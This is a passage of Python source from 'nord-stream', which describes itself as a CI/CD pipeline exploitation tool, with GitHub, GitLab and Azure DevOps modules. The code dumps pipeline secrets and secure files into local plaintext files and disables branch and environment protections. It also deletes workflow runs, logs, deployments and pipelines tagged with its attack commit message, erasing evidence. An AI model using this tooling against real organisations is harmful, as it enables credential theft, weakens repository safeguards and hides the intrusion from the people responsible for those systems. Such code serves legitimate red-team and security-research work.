self.__cleanRunLogs(projectId)
def listServiceConnections(self, projectId):
logger.debug("Listing service connections")
res = []
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/serviceendpoint/endpoints",
json={},
)
if response.status_code != 200:
raise DevOpsError("Can't list service connections.")
response = response.json()
if response.get("count", 0) != 0:
res = response.get("value")
return res
def getFailureReason(self, projectId, runId):
res = []
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}",
).json()
for result in response.get("validationResults"):
res.append(result.get("message"))
try:
timeline = self._session.get(
f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/Timeline",
).json()
for record in timeline.get("records", []):
if record.get("issues"):
for issue in record.get("issues"):
res.append(issue.get("message"))
except:
pass
return res
@classmethod
def getOrgs(cls, token):
logger.verbose(f"Listing orgs")
if isAZDOBearerToken(token):
# https://github.com/zolderio/devops/blob/main/get_profile_org_repos.py
url = "https://app.vssps.visualstudio.com/_apis/profile/profiles/me?api-version=7.1"
# Headers with authentication and content type
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
response = requests.get(url, headers=headers)
# Check if request was successful
response.raise_for_status()
# Parse and print the JSON response
data = response.json()
# Get organizations URL from profile response
orgs_url = "https://app.vssps.visualstudio.com/_apis/accounts?memberId={}?api-version=7.1".format(data['id'])
# Get organizations
orgs_response = requests.get(orgs_url, headers=headers)
orgs_response.raise_for_status()
return orgs_response.json()
else:
raise DevOpsError("Only access token can be used for this operation.")
================================================
FILE: nordstream/cicd/github.py
================================================
import requests
import time
from os import makedirs
import urllib.parse
from nordstream.utils.errors import GitHubError, GitHubBadCredentials
from nordstream.utils.log import logger
from nordstream.git import Git
from nordstream.utils.constants import *
class GitHub:
_DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME
_token = None
_auth = None
_org = None
_githubLogin = None
_repos = []
_header = {
"Accept": "application/vnd.github+json",
"User-Agent": USER_AGENT,
}
_repoURL = "https://api.github.com/repos"
_session = None
_branchName = _DEFAULT_BRANCH_NAME
_outputDir = OUTPUT_DIR
_sleepTime = 15
_maxRetry = 10
_isGHSToken = False
def __init__(self, token):
self._token = token
self._auth = ("foo", self._token)
self._session = requests.Session()
if token.lower().startswith("ghs_"):
self._isGHSToken = True
self._githubLogin = self.__getLogin()
@staticmethod
def checkToken(token):
logger.verbose(f"Checking token: {token}")
headers = GitHub._header
headers["Authorization"] = f"token {token}"
data = {"query": "query UserCurrent{viewer{login}}"}
return requests.post("https://api.github.com/graphql", headers=headers, json=data).status_code == 200
@property
def token(self):
return self._token
@property
def org(self):
return self._org
@org.setter
def org(self, org):
self._org = org
@property
def defaultBranchName(self):
return self._DEFAULT_BRANCH_NAME
@property
def branchName(self):
return self._branchName
@branchName.setter
def branchName(self, value):
self._branchName = value
@property
def repos(self):
return self._repos
@property
def outputDir(self):
return self._outputDir
@outputDir.setter
def outputDir(self, value):
self._outputDir = value
def __getLogin(self):
return self.getLoginWithGraphQL().json().get("data").get("viewer").get("login")
def getUser(self):
logger.debug("Retrieving user informations")
return self._session.get(f"https://api.github.com/user", auth=self._auth, headers=self._header)
def getLoginWithGraphQL(self):
logger.debug("Retrieving identity with GraphQL")
headers = self._header
headers["Authorization"] = f"token {self._token}"
data = {"query": "query UserCurrent{viewer{login}}"}
return self._session.post("https://api.github.com/graphql", headers=headers, json=data)
def __paginatedGet(self, url, data="", maxData=0):
page = 1
res = []
while True:
params = {"page": page}
response = self._session.get(
url,
params=params,
auth=self._auth,
headers=self._header,
).json()
if not isinstance(response, list) and response.get("message", None):
if response.get("message") == "Bad credentials":
raise GitHubBadCredentials(response.get("message"))
elif response.get("message") != "Not Found":
raise GitHubError(response.get("message"))
return res
if (data != "" and len(response.get(data)) == 0) or (data == "" and len(response) == 0):
break
if data != "" and len(response.get(data)) != 0:
res.extend(response.get(data, []))
if data == "" and len(response) != 0:
res.extend(response)
if maxData != 0 and len(res) >= maxData:
break
page += 1
return res
def listRepos(self):
logger.debug("Listing repos")
if self._isGHSToken:
url = f"https://api.github.com/orgs/{self._org}/repos"
else:
url = f"https://api.github.com/user/repos"
response = self.__paginatedGet(url)
for repo in response:
# filter for specific org
if self._org:
if self._org.lower() == repo.get("owner").get("login").lower():
self._repos.append(repo.get("full_name"))
else:
self._repos.append(repo.get("full_name"))
def addRepo(self, repo):
logger.debug(f"Checking repo: {repo}")
if self._org:
full_name = self._org + "/" + repo
else:
# if no org, must provide repo as 'org/repo'
# FIXME: This cannot happen at the moment because --org argument is required
if len(repo.split("/")) == 2:
full_name = repo
else:
# FIXME: Raise an Exception here
logger.error("Invalid repo name: {repo}")
response = self._session.get(
f"{self._repoURL}/{full_name}",
auth=self._auth,
headers=self._header,
).json()
if response.get("message", None) and response.get("message") == "Bad credentials":
raise GitHubBadCredentials(response.get("message"))
if response.get("id"):
self._repos.append(response.get("full_name"))
def listEnvFromrepo(self, repo):
logger.debug(f"Listing environment secret from repo: {repo}")
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments", data="environments")
for env in response:
res.append(env.get("name"))
return res
def listSecretsFromEnv(self, repo, env):
logger.debug(f"Getting environment secrets for {repo}: {env}")
envReq = urllib.parse.quote(env, safe="")
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments/{envReq}/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listSecretsFromRepo(self, repo):
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listOrganizationSecretsFromRepo(self, repo):
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/organization-secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listDependabotSecretsFromRepo(self, repo):
res = []
response = self.__paginatedGet(f"{self._repoURL}/{repo}/dependabot/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listDependabotOrganizationSecrets(self):
res = []
response = self.__paginatedGet(f"https://api.github.com/orgs/{self._org}/dependabot/secrets", data="secrets")
for sec in response:
res.append(sec.get("name"))
return res
def listEnvProtections(self, repo, env):
logger.debug("Getting environment protections")
envReq = urllib.parse.quote(env, safe="")
res = []
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}",
auth=self._auth,
headers=self._header,
).json()
for protection in response.get("protection_rules"):
protectionType = protection.get("type")
res.append(protectionType)
return res
def getEnvDetails(self, repo, env):
envReq = urllib.parse.quote(env, safe="")
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}",
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
return response
def createDeploymentBranchPolicy(self, repo, env):
envReq = urllib.parse.quote(env, safe="")
logger.debug(f"Adding new branch policy for {self._branchName} on {envReq}")
data = {"name": f"{self._branchName}"}
response = self._session.post(
f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies",
json=data,
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
policyId = response.get("id")
logger.debug(f"Branch policy id: {policyId}")
return policyId
def deleteDeploymentBranchPolicy(self, repo, env):
logger.debug("Delete deployment branch policy")
envReq = urllib.parse.quote(env, safe="")
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}",
auth=self._auth,
headers=self._header,
).json()
if response.get("deployment_branch_policy") is not None:
response = self._session.get(
f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies",
auth=self._auth,
headers=self._header,
).json()
for policy in response.get("branch_policies"):
if policy.get("name").lower() == self._branchName.lower():
logger.verbose(f"Deleting branch policy for {self._branchName} on {envReq}")
policyId = policy.get("id")
self._session.delete(
f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies/{policyId}",
auth=self._auth,
headers=self._header,
)
def disableBranchProtectionRules(self, repo):
logger.debug("Modifying branch protection")
response = self._session.get(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("name") and response.get("protected"):
data = {
"required_status_checks": None,
"enforce_admins": False,
"required_pull_request_reviews": None,
"restrictions": None,
"allow_deletions": True,
"allow_force_pushes": True,
}
self._session.put(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection",
json=data,
auth=self._auth,
headers=self._header,
)
def modifyEnvProtectionRules(self, repo, env, wait, reviewers, branchPolicy):
data = {
"wait_timer": wait,
"reviewers": reviewers,
"deployment_branch_policy": branchPolicy,
}
envReq = urllib.parse.quote(env, safe="")
response = self._session.put(
f"{self._repoURL}/{repo}/environments/{envReq}",
json=data,
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
return response
def deleteDeploymentBranchPolicyForAllEnv(self, repo):
allEnv = self.listEnvFromrepo(repo)
for env in allEnv:
self.deleteDeploymentBranchPolicy(repo, env)
def checkBranchProtectionRules(self, repo):
response = self._session.get(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
raise GitHubError(response.get("message"))
return response.get("protected")
def getBranchesProtectionRules(self, repo):
logger.debug("Getting branch protection rules")
response = self._session.get(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection",
auth=self._auth,
headers=self._header,
).json()
if response.get("message"):
return None
return response
def updateBranchesProtectionRules(self, repo, protections):
logger.debug("Updating branch protection rules")
response = self._session.put(
f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection",
auth=self._auth,
headers=self._header,
json=protections,
).json()
return response
def cleanDeploymentsLogs(self, repo):
logger.verbose(f"Cleaning deployment logs from: {repo}")
url = f"{self._repoURL}/{repo}/deployments?ref={urllib.parse.quote(self._branchName)}"
response = self.__paginatedGet(url, maxData=200)
for deployment in response:
if not self._isGHSToken and deployment.get("creator").get("login").lower() != self._githubLogin.lower():
continue
commit = self._session.get(
f"{self._repoURL}/{repo}/commits/{deployment['sha']}", auth=self._auth, headers=self._header
).json()
# We want to delete only our action so we must filter some attributes
if commit["commit"]["message"] not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]:
continue
if commit["commit"]["committer"]["name"] != Git.USER:
continue
if commit["commit"]["committer"]["email"] != Git.EMAIL:
continue
deploymentId = deployment.get("id")
data = {"state": "inactive"}
self._session.post(
f"{self._repoURL}/{repo}/deployments/{deploymentId}/statuses",
json=data,
auth=self._auth,
headers=self._header,
)
self._session.delete(
f"{self._repoURL}/{repo}/deployments/{deploymentId}",
auth=self._auth,
headers=self._header,
)
def cleanRunLogs(self, repo, workflowFilename):
logger.verbose(f"Cleaning run logs from: {repo}")
url = f"{self._repoURL}/{repo}/actions/runs?branch={urllib.parse.quote(self._branchName)}"
if not self._isGHSToken:
url += f"&actor={self._githubLogin.lower()}"
# we dont scan for all the logs we only check the last 200
response = self.__paginatedGet(url, data="workflow_runs", maxData=200)
for run in response:
# skip if it's not our commit
if run.get("head_commit").get("message") not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]:
continue
committer = run.get("head_commit").get("committer")
if committer.get("name") != Git.USER:
continue
if committer.get("email") != Git.EMAIL:
continue
runId = run.get("id")
status = (
self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
json={},
auth=self._auth,
headers=self._header,
)
.json()
.get("status")
)
if status != "completed":
self._session.post(
f"{self._repoURL}/{repo}/actions/runs/{runId}/cancel",
json={},
auth=self._auth,
headers=self._header,
)
status = (
self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
json={},
auth=self._auth,
headers=self._header,
)
.json()
.get("status")
)
if status != "completed":
for i in range(self._maxRetry):
time.sleep(2)
status = (
self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
json={},
auth=self._auth,
headers=self._header,
)
.json()
.get("status")
)
if status == "completed":
break
self._session.delete(
f"{self._repoURL}/{repo}/actions/runs/{runId}/logs",
auth=self._auth,
headers=self._header,
)
self._session.delete(
f"{self._repoURL}/{repo}/actions/runs/{runId}",
auth=self._auth,
headers=self._header,
)
def cleanAllLogs(self, repo, workflowFilename):
logger.debug(f"Cleaning logs for: {repo}")
self.cleanRunLogs(repo, workflowFilename)
self.cleanDeploymentsLogs(repo)
def createWorkflowOutputDir(self, repo):
outputName = repo.split("/")
makedirs(f"{self._outputDir}/{outputName[0]}/{outputName[1]}", exist_ok=True)
def waitWorkflow(self, repo, workflowFilename):
logger.info("Getting workflow output")
time.sleep(5)
workflowFilename = urllib.parse.quote_plus(workflowFilename)
response = self._session.get(
f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("total_count", 0) == 0:
for i in range(self._maxRetry):
logger.warning(f"Workflow not started, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("total_count", 0) != 0:
break
if i == (self._maxRetry - 1):
logger.error("Error: workflow still not started.")
return None, None
if response.get("workflow_runs")[0].get("status") != "completed":
for i in range(self._maxRetry):
logger.warning(f"Workflow not finished, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}",
auth=self._auth,
headers=self._header,
).json()
if response.get("workflow_runs")[0].get("status") == "completed":
break
if i == (self._maxRetry - 1):
logger.error("Error: workflow still not finished.")
return (
response.get("workflow_runs")[0].get("id"),
response.get("workflow_runs")[0].get("conclusion"),
)
def downloadWorkflowOutput(self, repo, name, workflowId):
self.createWorkflowOutputDir(repo)
zipFile = self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{workflowId}/logs",
auth=self._auth,
headers=self._header,
)
date = time.strftime("%Y-%m-%d_%H-%M-%S")
with open(f"{self._outputDir}/{repo}/workflow_{name}_{date}.zip", "wb") as f:
f.write(zipFile.content)
f.close()
return f"workflow_{name}_{date}.zip"
def getFailureReason(self, repo, workflowId):
res = []
workflow = self._session.get(
f"{self._repoURL}/{repo}/actions/runs/{workflowId}",
auth=self._auth,
headers=self._header,
).json()
checkSuiteId = workflow.get("check_suite_id")
checkRuns = self._session.get(
f"{self._repoURL}/{repo}/check-suites/{checkSuiteId}/check-runs",
auth=self._auth,
headers=self._header,
).json()
if checkRuns.get("total_count"):
for checkRun in checkRuns.get("check_runs"):
checkRunId = checkRun.get("id")
annotations = self._session.get(
f"{self._repoURL}/{repo}/check-runs/{checkRunId}/annotations",
auth=self._auth,
headers=self._header,
).json()
for annotation in annotations:
res.append(annotation.get("message"))
return res
def filterWriteRepos(self):
res = []
for repo in self._repos:
try:
self.listSecretsFromRepo(repo)
res.append(repo)
except GitHubError:
pass
self._repos = res
def isGHSToken(self):
return self._isGHSToken
================================================
FILE: nordstream/cicd/gitlab.py
================================================
import requests
import time
import re
import sys
from os import makedirs
from nordstream.utils.log import logger
from nordstream.utils.errors import GitLabError
from nordstream.git import Git
from nordstream.utils.constants import *
from nordstream.utils.helpers import isGitLabSessionCookie
# painful warnings you know what you are doing right ?
requests.packages.urllib3.disable_warnings()
class GitLab:
_DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME
_auth = None
_session = None
_token = None
_projects = []
_groups = []
_outputDir = OUTPUT_DIR
_headers = {
"User-Agent": USER_AGENT,
}
_cookies = {}
_gitlabURL = None
_branchName = _DEFAULT_BRANCH_NAME
_sleepTime = 15
_maxRetry = 10
def __init__(self, url, token, verifCert):
self._gitlabURL = url.strip("/")
self._token = token
self._session = requests.Session()
self._session.verify = verifCert
self.setCookiesAndHeaders()
self._gitlabLogin = self.__getLogin()
@property
def projects(self):
return self._projects
@property
def groups(self):
return self._groups
@property
def token(self):
return self._token
@property
def url(self):
return self._gitlabURL
@property
def outputDir(self):
return self._outputDir
@outputDir.setter
def outputDir(self, value):
self._outputDir = value
@property
def defaultBranchName(self):
return self._DEFAULT_BRANCH_NAME
@property
def branchName(self):
return self._branchName
@branchName.setter
def branchName(self, value):
self._branchName = value
@classmethod
def checkToken(cls, token, gitlabURL, verifyCert):
logger.verbose(f"Checking token: {token}")
# from https://docs.gitlab.com/ee/api/rest/index.html#personalprojectgroup-access-tokens
try:
cookies = {}
headers = GitLab._headers
if isGitLabSessionCookie(token):
cookies["_gitlab_session"] = token
else:
headers["PRIVATE-TOKEN"] = token
return (
requests.get(
f"{gitlabURL.strip('/')}/api/v4/user",
headers=headers,
cookies=cookies,
verify=verifyCert,
).status_code
== 200
)
except requests.exceptions.RequestException as e:
logger.error(e)
sys.exit(1)
return False
def __getLogin(self):
response = self.getUser()
return response.get("username", "")
def getUser(self):
logger.debug(f"Retrieving user information")
return self._session.get(f"{self._gitlabURL}/api/v4/user").json()
def setCookiesAndHeaders(self):
if isGitLabSessionCookie(self._token):
self._session.cookies.update({"_gitlab_session": self._token})
else:
self._session.headers.update({"PRIVATE-TOKEN": self._token})
self._session.headers.update(self._headers)
def __paginatedGet(self, url, params={}):
params["per_page"] = 100
res = []
i = 1
while True:
params["page"] = i
logger.debug(f"Paginated GET request to {url} with parameters {params}")
response = self._session.get(url, params=params)
if response.status_code == 200:
if len(response.json()) == 0:
break
res.extend(response.json())
i += 1
else:
logger.debug(f"Error {response.status_code} while retrieving data: {url}")
return response.status_code, response.json()
return response.status_code, res
def listRunnersFromProject(self, project):
id = project.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/jobs")
if status_code == 200 and len(response) > 0:
for job in response:
if not job.get("runner") or not job.get("runner_manager"):
continue
# Get executor from job trace
executor = "unknown"
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{id}/jobs/{job['id']}/trace")
if response.status_code == 200 and len(response.text) > 0:
regex = r'Preparing the "([^"]+)" executor'
match = re.search(r'Preparing the "([^"]+)" executor', response.text)
if match:
executor = match.group(1)
_runner = job["runner"]
_manager = job["runner_manager"]
res.append(
{
"id": f"{_runner['id']}/{_manager['system_id']}",
"status": _manager["status"],
"contacted_at": _manager["contacted_at"],
"runner_type": _runner["runner_type"],
"access_level": "unknown",
"executor": executor,
"description": _runner["description"],
"platform": _manager["platform"],
"architecture": _manager["architecture"],
"ip_address": _manager["ip_address"],
"version": _manager["version"],
"projects": [project["path_with_namespace"]],
"tags": job["tag_list"],
}
)
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listVariablesFromProject(self, project):
id = project.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/variables")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir(project.get("path_with_namespace"))
f = open(f"{path}/secrets.txt", "w")
for variable in response:
secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['value']}\n")
f.close()
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listInheritedVariablesFromProject(self, project):
id = project.get("id")
res = []
graphQL = {
"operationName": "getInheritedCiVariables",
"variables": {"first": 100, "fullPath": project.get("path_with_namespace")},
"query": """
query getInheritedCiVariables($after: String, $first: Int, $fullPath: ID!) {
project(fullPath: $fullPath) {
inheritedCiVariables(after: $after, first: $first) {
nodes {
key
groupName
masked
hidden
protected
raw
}
}
}
}
""",
}
response = self._session.post(f"{self._gitlabURL}/api/graphql", json=graphQL)
if response.status_code == 200 and len(response.text) > 0:
if response.json().get("data", {}).get("project", {}) is None:
return res
path = self.__createOutputDir(project.get("path_with_namespace"))
f = open(f"{path}/secrets.txt", "a")
nodes = response.json().get("data", {}).get("project", {}).get("inheritedCiVariables", {}).get("nodes", [])
for variable in nodes:
secret = {
"key": variable["key"],
"value": variable["raw"],
"group": variable["groupName"],
"protected": variable["protected"],
}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['raw']}\n")
f.close()
elif response.status_code == 403:
raise GitLabError(response.get("message"))
return res
def listSecureFilesFromProject(self, project):
logger.debug("Getting project secure files")
id = project.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/secure_files")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir(project.get("path_with_namespace"))
date = time.strftime("%Y-%m-%d_%H-%M-%S")
for secFile in response:
date = time.strftime("%Y-%m-%d_%H-%M-%S")
name = "".join(
[c for c in secFile.get("name") if c.isalpha() or c.isdigit() or c in (" ", ".", "-", "_")]
).strip()
fileName = f"securefile_{date}_{name}"
f = open(f"{path}/{fileName}", "wb")
content = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{id}/secure_files/{secFile.get('id')}/download"
)
# handle large files
for chunk in content.iter_content(chunk_size=8192):
f.write(chunk)
f.close()
res.append({"name": secFile.get("name"), "path": f"{path}/{fileName}"})
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listVariablesFromGroup(self, group):
id = group.get("id")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups/{id}/variables")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir(group.get("full_path"))
f = open(f"{path}/secrets.txt", "w")
for variable in response:
secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['value']}\n")
f.close()
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def listVariablesFromInstance(self):
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/admin/ci/variables")
if status_code == 200 and len(response) > 0:
path = self.__createOutputDir("")
f = open(f"{path}/secrets.txt", "w")
for variable in response:
secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]}
if variable.get("hidden") is not None:
secret["hidden"] = variable["hidden"]
else:
secret["hidden"] = "N/A"
res.append(secret)
f.write(f"{variable['key']}={variable['value']}\n")
f.close()
elif status_code == 403:
raise GitLabError(response.get("message"))
return res
def addProjects(self, project=None, filterWrite=False, strict=False, membership=False):
params = {}
if membership:
params["membership"] = True
if project != None:
params["search_namespaces"] = True
params["search"] = project
if filterWrite:
params["min_access_level"] = 30
if not (project and project.isnumeric()):
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects", params)
else:
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{project}")
status_code = response.status_code
response = [response.json()]
if status_code == 200:
if len(response) == 0:
return
for p in response:
if strict and p.get("path_with_namespace") != project:
continue
p = {
"id": p.get("id"),
"path_with_namespace": p.get("path_with_namespace"),
"name": p.get("name"),
"path": p.get("path"),
}
self._projects.append(p)
else:
logger.error(f"Error while retrieving {f'project: {project}' if project is not None else 'projects'}")
logger.debug(response)
def addGroups(self, group=None):
params = {"all_available": True}
if group != None:
params["search_namespaces"] = True
params["search"] = group
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups", params)
if status_code == 200:
if len(response) == 0:
return
for p in response:
p = {
"id": p.get("id"),
"full_path": p.get("full_path"),
"name": p.get("name"),
}
self._groups.append(p)
else:
logger.error("Error while retrieving groups")
logger.debug(response)
def listUsers(self):
logger.debug(f"Listing users.")
res = []
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/users")
if status_code == 200:
if len(response) == 0:
return
for p in response:
u = {
"id": p.get("id"),
"username": p.get("username"),
"email": p.get("email"),
"is_admin": p.get("is_admin"),
}
res.append(u)
else:
logger.error("Error while retrieving users")
logger.debug(response)
return res
def __createOutputDir(self, name):
# outputName = name.replace("/", "_")
path = f"{self._outputDir}/{name}"
makedirs(path, exist_ok=True)
return path
def waitPipeline(self, projectId):
logger.info("Getting pipeline output")
time.sleep(5)
response = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}"
).json()
if response[0].get("status") not in COMPLETED_STATES:
for i in range(self._maxRetry):
logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}"
).json()
if response[0].get("status") in COMPLETED_STATES:
break
if i == (self._maxRetry - 1):
logger.error("Error: pipeline still not finished.")
return (
response[0].get("id"),
response[0].get("status"),
)
def __getJobs(self, projectId, pipelineId):
status_code, response = self.__paginatedGet(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines/{pipelineId}/jobs"
)
if status_code == 403:
raise GitLabError(response.get("message"))
# reverse the list to get the first job at the first position
return response[::-1]
def downloadPipelineOutput(self, project, pipelineId):
projectPath = project.get("path_with_namespace")
self.__createOutputDir(projectPath)
projectId = project.get("id")
jobs = self.__getJobs(projectId, pipelineId)
date = time.strftime("%Y-%m-%d_%H-%M-%S")
f = open(f"{self._outputDir}/{projectPath}/pipeline_{date}.log", "w")
if len(jobs) == 0:
return None
for job in jobs:
jobId = job.get("id")
jobName = job.get("name", "")
jobStage = job.get("stage", "")
jobStatus = job.get("status", "")
output = self.__getTraceForJobId(projectId, jobId)
if jobStatus != "skipped":
f.write(f"[+] {jobName} (stage={jobStage})\n")
f.write(output)
f.close()
return f"pipeline_{date}.log"
def __getTraceForJobId(self, projectId, jobId):
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace")
if response.status_code != 200:
for i in range(self._maxRetry):
logger.warning(f"Output not ready, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace")
if response.status_code == 200:
break
if i == (self._maxRetry - 1):
logger.error("Output still no ready, error !")
return None
return response.text
def __deletePipeline(self, projectId):
logger.debug("Deleting pipeline")
status_code, response = self.__paginatedGet(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}"
)
headers = {}
# Get CSRF token when using session cookie otherwise we can't delete a pipeline
if isGitLabSessionCookie(self._token):
html_content = self._session.get(f"{self._gitlabURL}/").text
pattern = r'<meta name="csrf-token" content="([^"]+)"'
match = re.search(pattern, html_content)
csrf_token = match.group(1)
headers["x-csrf-token"] = csrf_token
for pipeline in response:
# additional checks for non default branches
# we don't want to remove legitimate logs
if self._branchName != self._DEFAULT_BRANCH_NAME:
commitId = pipeline.get("sha")
response = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/commits/{commitId}"
).json()
if response.get("title") not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]:
continue
if response.get("author_name") != Git.USER:
continue
pipelineId = pipeline.get("id")
graphQL = {
"operationName": "deletePipeline",
"variables": {"id": f"gid://gitlab/Ci::Pipeline/{pipelineId}"},
"query": "mutation deletePipeline($id: CiPipelineID!) {\n pipelineDestroy(input: {id: $id}) {\n errors\n __typename\n }\n}\n",
}
response = self._session.post(f"{self._gitlabURL}/api/graphql", json=graphQL, headers=headers)
def cleanAllLogs(self, projectId):
# deleting the pipeline removes everything
self.__deletePipeline(projectId)
# not working
def __cleanEvents(self, projectId):
logger.debug(f"Deleting events for project: {projectId}")
i = 1
while True:
params = {"per_page": 100, "page": i}
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/events", params=params)
if response.status_code == 200:
if len(response.json()) == 0:
break
for event in response.json():
eventId = event.get("id")
# don't work
response = self._session.delete(f"{self._gitlabURL}/api/v4/projects/{projectId}/events/{eventId}")
i += 1
else:
logger.error("Error while retrieving event")
logger.debug(response.json())
def getBranchesProtectionRules(self, projectId):
logger.debug("Getting branch protection rules")
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{projectId}/protected_branches")
if status_code == 403:
raise GitLabError(response.get("message"))
return response
def getBranches(self, projectId):
logger.debug("Getting branch protection rules (limited)")
status_code, response = self.__paginatedGet(
f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/branches"
)
if status_code == 403:
raise GitLabError(response.get("message"))
# sometimes GitLab return a 404 and not an empty array
if status_code == 404:
project = self.getProject(projectId)
# if the repo is empty raise an error since there is no branch
if project.get("empty_repo"):
raise GitLabError("The project is empty and has no branches.")
else:
raise GitLabError("Got 404 for unknown reason.")
return response
def getProject(self, projectId):
logger.debug("Getting project: {projectId}")
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}")
if response.status_code != 200:
raise GitLabError(response.json().get("message"))
else:
return response.json()
def getFailureReasonPipeline(self, projectId, pipelineId):
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines/{pipelineId}").json()
return response.get("yaml_errors", None)
def getFailureReasonJobs(self, projectId, pipelineId):
res = []
jobs = self.__getJobs(projectId, pipelineId)
for job in jobs:
failure = {}
failure["name"] = job.get("name", "")
failure["stage"] = job.get("stage", "")
failure["failure_reason"] = job.get("failure_reason", "")
if failure["failure_reason"] != "":
res.append(failure)
return res
================================================
FILE: nordstream/commands/devops.py
================================================
"""
CICD pipeline exploitation tool
Usage:
nord-stream devops [options] --token <pat> --org <org> [extraction] [--project <project> --write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name> --pool-name <name> --os <os> --default-agent <name> --sleep <int>]
